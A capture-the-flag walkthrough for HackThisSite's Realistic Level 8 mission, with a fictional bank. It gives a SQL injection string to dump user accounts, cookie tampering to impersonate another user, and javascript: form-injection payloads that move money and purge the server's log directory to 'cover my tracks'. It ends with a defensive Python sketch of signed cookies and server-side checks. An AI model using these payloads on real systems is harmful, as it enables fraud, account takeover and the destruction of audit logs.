Hackthissite/Realistic/Level8
- Level: Realistic::8 (United Banks Of America)
- URL: http://www.hackthissite.org/missions/realistic/8/
- Difficulty :
- Exercise: One of America's Richest Men plans to donate $10,000,000 to a campaign set on hunting down hackers and locking them up. Please, if you can't do this, then we're all screwed. Can you hack in and move the money?
Message: Hey man, you gotta help me out, Gary Hunter, one of the richest men in America, has just deposited $10,000,000 into his bank account at the United Banks Of America and plans to donate that money to a campaign to hunt down and lock up all hackers. Now I've tried hacking their site but I'm just not good enough. That's why I need your help. Here's a list of your objectives:
- Find the account of Gary Hunter (I don't know his account name).
- Move the $10,000,000 into the account dropCash.
- Clear The Logs, They're held in the folder 'logFiles'.
I really hope you can do this, because if you can't we're all screwed
- Solution:
Information
From the navigation and the source code of the pages, we gather the following information:
Description | Page | Fields |
---|---|---|
Register pages | Register.php > register2.php | |
Login pages | login1.php > login2.php | |
Purge files | cleardir.php | <input type='hidden' name='dir' value='loginSQLFiles'> |
Transfer money from one account to another | movemoney.php | |
Authentication cookie (created after successful authentication):
- accountUsername=<login>
- accountPassword=<password>
Our target:
- Name: Gary Hunter
- Transfer $10,000,000 into the account dropCash.
- Log directory: logFiles
Objective 1: Find the account of Gary Hunter
First create your own account and log in. Once done, type the following command in the URL bar: javascript:alert(document.cookie); It shows our cookie value: the login and password are stored in the cookie in clear text, indicating that the site is vulnerable. Then go to the user info page and enter a SQL injection whose condition is always true, so that the query returns the list of all users: ' or 'a'='a.
By scrolling down, we find:
GaryWilliamHunter : -- $$$$$ --
The 2 values are separated by a colon:
- Before colon: the login (GaryWilliamHunter)
- After colon: the description (-- $$$$$ --)
Objective 2: Move the $10,000,000 into the account dropCash
Entering the following code in the URL bar displays the cookie contents in clear text, which shows that the site is vulnerable to cookie injection:
javascript:alert(document.cookie);
Install Firebug and Firecookie for Firefox. Then change the value of the cookie named "accountUsername" to "GaryWilliamHunter" and use the following JS injection (copy/paste it into the URL bar):
javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))
It dynamically writes a form on the page, containing the values needed for a transfer:
- FORM ACTION: movemoney.php, as specified in the exercise
- FROM: value taken from the modified cookie (GaryWilliamHunter)
- TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
- AMOUNT: value specified in the exercise. We know this field from the information we gathered.
Submitting the form completes the stage.
Objective 3: Clear The Logs, They're held in the folder 'logFiles'
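Copy/paste the following code into the URL bar. It posts to cleardir.php with the hidden dir field set to logFiles instead of loginSQLFiles: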
javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))
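The transfer and the log purge both go through because the server trusts values the client controls: the accountUsername cookie and the hidden dir field. The Python sketch below is an added example, not code from the site or from the original page; it shows a server-side check that rejects both requests, assuming an HMAC-signed session cookie and a per-account directory allowlist (SERVER_KEY, PURGEABLE_DIRS, the account alice and all function names are hypothetical).

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Constructed for this example: a secret that exists only on the server.
SERVER_KEY = secrets.token_bytes(32)

# Hypothetical server-side policy: directories each account may purge.
PURGEABLE_DIRS = {"alice": {"loginSQLFiles"}}


def _tag(username: str) -> str:
    return hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()


def issue_session(username: str) -> str:
    """Cookie value set at login: the username bound to an HMAC tag.
    No password is stored in the cookie."""
    return f"{username}.{_tag(username)}"


def authenticated_user(cookie: str) -> Optional[str]:
    """Return the username only if the tag matches; an edited cookie yields None."""
    username, sep, tag = cookie.rpartition(".")
    if not sep or not username:
        return None
    # Compare as bytes in constant time; also safe for non-ASCII tampered input.
    ok = hmac.compare_digest(tag.encode(), _tag(username).encode())
    return username if ok else None


def authorize_transfer(cookie: str, to_account: str, amount: int) -> Optional[dict]:
    """movemoney-style handler: FROM is the verified session user,
    never a raw cookie or form value."""
    user = authenticated_user(cookie)
    if user is None or amount <= 0:
        return None
    return {"from": user, "to": to_account, "amount": amount}


def authorize_purge(cookie: str, requested_dir: str) -> bool:
    """cleardir-style handler: the posted 'dir' is checked against
    server-side policy instead of being trusted as a hidden field."""
    user = authenticated_user(cookie)
    return user is not None and requested_dir in PURGEABLE_DIRS.get(user, set())
```

A production session cookie would also carry an expiry and be set with the HttpOnly and Secure attributes, so that page script such as alert(document.cookie) cannot read it.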